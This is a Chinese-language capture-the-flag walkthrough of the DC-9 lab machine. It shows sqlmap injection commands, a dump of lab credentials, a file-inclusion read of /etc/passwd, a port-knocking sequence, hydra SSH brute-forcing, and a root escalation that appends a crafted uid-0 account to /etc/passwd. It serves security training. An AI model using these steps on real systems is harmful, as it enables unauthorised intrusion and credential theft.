DC9

admin 2025年2月21日12:25:15评论6 views字数 2420阅读8分4秒阅读模式

靶机地址:https://www.vulnhub.com/entry/dc-9,412/

攻击者IP:192.168.56.108 桥接(自动) vmare

受害者IP:192.168.56.123 仅主机 vmbox

参考:https://blog.csdn.net/Auuuuuuuu/article/details/104592327

https://blog.csdn.net/qq_43462485/article/details/109456721

https://blog.csdn.net/JSH_CDX/article/details/105257482

主机发现

DC9

端口扫描

DC9

目录扫描

后台登陆地址http://192.168.56.123/manage.php

DC9

密码爆破

DC9

manage.php sql注入

DC9

http://192.168.56.123/display.php有目录

DC9

可以用名字查询如Julie ,Mary

results可能有sql注入

DC9

burp抓包放到2.txt

sqlmap -r 2.txt --batch --dbssqlmap -r 2.txt --batch -D "Staff" --tablessqlmap -r 2.txt --batch -D "Staff" -T "Users" --columns

+--------+----------------------------------+----------+          | UserID | Password | Username |          +--------+----------------------------------+----------+          | 1 | 856f5de590ef37314e7c3bdf6f8a66dc | admin |          +--------+----------------------------------+----------+

DC9

DC9

md5解密

admin/transorbital1

DC9

登陆登陆

文件不存在,猜测可能有文件包含

DC9

确实有文件包含漏洞

p?file=../../../../etc/passwd

DC9

把用户名和密码放到usr.txt,pwd.txt

sqlmap -r 2.txt--dbssqlmap -r 2.txt-D "users" --tables --batchsqlmap -r 2.txt-D "users" -T "UserDetails"--dump --batch

username:

marymjuliedfredfbarneyrtomcjerrymwilmafbettyrchandlerbjoeytrachelgrossgmonicagphoebebscootsjanitorjanitor2admin

password:

3kfs86sfd468sfdfsd24sfd87sfd1RocksOffTC&TheBoyzB8m#48sdPebblesBamBam01UrAG0D!Passw0rdyN72#dsdILoveRachel3248dsds7ssmellycatsYR3BVxxxw87IlovepeepeeHawaii-Five-0transorbital1

DC9

发现无法连接

DC9

这个knockd.conf是一种端口试探服务器工具。          它侦听以太网或其他可用接口上的所有流量,等待特殊序列的端口命中(port-hit)。          telnet或Putty等客户软件通过向服务器上的端口发送TCP或数据包来启动端口命中,          也可以直接用nc敲击端口。

简单来说就是用来隐藏ssh登陆端口。(也就是我们之前扫描端口时发现22端口阻塞)只有我们按照设定的顺序敲击端口,防火墙才会打开登陆端口。再按照同样的方式可以使防火墙关闭ssh登陆端口,如果别人不知道我们设定的端口敲击顺序,是无法登陆ssh的。

DC9

端口敲门

nc/nmap

7469,8475,9842

nc 192.168.56.123 7469nc 192.168.56.123 8475nc 192.168.56.123 9842nmap -p7469 192.168.56.123nmap -p8475 192.168.56.123nmap -p9842 192.168.56.123nmap -p22 192.168.56.123

DC9

hydra -L use.txt -P pwd.txt -vV ssh://192.168.56.123:22 -f

重新爆破一下

chandlerb/UrAG0D!joeyt/Passw0rdjanitor/Ilovepeepee

DC9

janitor有密码,给添加到pwd.txt

DC9

没有权限

DC9

hydra -L use.txt -P pwd.txt ssh://192.168.56.123:22 

得到新用户

fredf/B4-Tru3-001

DC9

发现sudo -l可以使用,得到了一个可以以root身份执行的脚本

DC9

提示使用 python test.py 加参数运行,使用find命令找到该文件,查看源代码

find / -name "test.py" 2>/dev/null

该脚本可以将指定内容写到指定文件里,运行脚本时,第一个参数为要读取内容,第二个参数将读取的内容写到指定文件,我们可以通过修改/etc/passwd/文件来实现指定用户是否为root,所以,我们构造一个root权限的用户文件,写入到/etc/passwd文件中,即可成功拿下root

DC9

通过向/etc/passwd中添加用户达到提权,直接添加一个还不行,还需要经过加密

-1 :使用md5加密算法-salt :自动插入一个随机数作为文件内容加密openssl passwd -1 -salt hhh 123456echo 'hhh:$1$hhh$kY5dhcOZMbugbkqX07NY1/:0:0:root:/bin/bash' >> /tmp/hhhsudo ./test /tmp/hhh /etc/passwd

DC9

原文始发于微信公众号(王之暴龙战神):DC9

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月21日12:25:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   DC9https://cn-sec.com/archives/3766112.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息